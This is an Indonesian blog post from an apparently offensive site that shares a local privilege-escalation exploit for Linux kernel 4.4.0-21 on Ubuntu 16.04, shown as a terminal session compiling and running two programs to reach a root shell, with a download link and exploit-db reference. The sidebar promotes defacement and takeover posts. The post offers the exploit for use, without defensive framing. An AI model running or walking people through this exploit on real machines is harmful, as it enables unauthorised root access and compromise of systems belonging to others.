• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) Privilege Escalation

September 19, 2016 by Jack Wilder 1 Comment

Holaa.. kali ini mau share aja barangkali ada yang belom tau. Localroot kernel 4.4.0-21 (xenial) 64 bit.

vnik@ubuntu:~$ uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
vnik@ubuntu:~$ ./decr
netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
[!] Decrementing the refcount. This may take a while…
[!] Wait for the “Done” message (even if you’ll get the prompt back).
vnik@ubuntu:~$ [+] Done! Now run ./pwn

vnik@ubuntu:~$ ./pwn
[+] Escalating privs…
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# 

Download :
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) Privilege Escalation
Ref :
https://www.exploit-db.com/exploits/40049/

Filed Under: Uncategorized Tagged With: Exploit, Linux, Localroot, Ubuntu

Reader Interactions

Comments

  1. muhammad sibli says

    October 30, 2016 at 2:08 pm

    ini untuk apa ya? dan cara pakainya gmana?

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

DNS Hijacking through Social Engineering

WordPress Army Knife CSRF File Upload Vulnerability

Exploit WPStore Themes Upload Vulnerability

Uptimerobot.com Custom Domain or Subdomain Takeover

Deface dengan Metode Timthumb Remote Code Execution

Open Redirect Bypass Cheat Sheet

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

Deteksi Kerentanan Execution After Redirect (EAR)

Mass Deface setelah Rooting Server

GitHub Custom Domain or Subdomain Takeover

LinuxSec / 16 queries in 0.15 seconds